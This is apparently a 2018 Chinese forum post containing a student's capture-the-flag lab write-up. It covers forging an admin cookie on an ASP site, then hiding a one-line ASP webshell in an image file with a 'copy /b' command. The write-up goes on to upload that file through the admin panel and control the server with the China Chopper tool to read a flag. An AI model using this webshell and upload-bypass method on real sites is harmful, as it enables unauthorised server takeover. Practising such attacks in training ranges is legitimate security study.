tester作业提交(靶场第五章:进击!拿到Web最高权限!)

tester   ·   发表于 2018-08-07 15:18:14   ·   CTF&WP专版

一、Cookie伪造:

1. 点击传送门

2. 进入目标页:http://120.203.13.75:8002/admin/Login.asp

3. 鼠标邮件点击目标页面,点击检查,打开开发者工具

4. 点击Application

5. 展开点击Cookies,选择当前SERVER_NAME,在右侧红框中双击,

输入上一题获得的管理员Cookie:

Name输入ADMINSESSIONIDCSTRCSDQ

Value输入LBMLMBCCNPFINOANFGLPCFBC


6. 点击目标页准备好了吗链接或者直接刷新当前页面

7. 进入网站管理后台


通过伪造cookie获的管理员登陆权限后,就要在后台找个上传点,从而将木马上传到服务器


二、准备一句话木马:<%eval request ("pass")%>,保存为1.asp(因为当前页面是用asp做的),注意文本编辑器的编码格式选择UTF-8

转成图片马:

在CMD中输入下边的语句

copy 1.jgp/b+1.asp 1.cer


三、在产品管理->产品管理中编辑产品,红框中上传准备好的图片马1.cer

四、通过菜刀访问到服务器查看服务器文件,页面空白处,右键菜单中选择添加

地址:http://120.203.13.75:8002/UploadFiles/2018829814851.cer地址后边的空格中输入:pass脚本类型:ASP(Eval)

点击添加


五、成功 后,列表中有一条新增的记录

双击这条新增的记录,进入服务器


在E:5\FLAG!.txt中拿到Flag:zkz{*************}


打赏我,让我更有动力~

0 Reply   |  Until 2018-8-7 | 2014 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.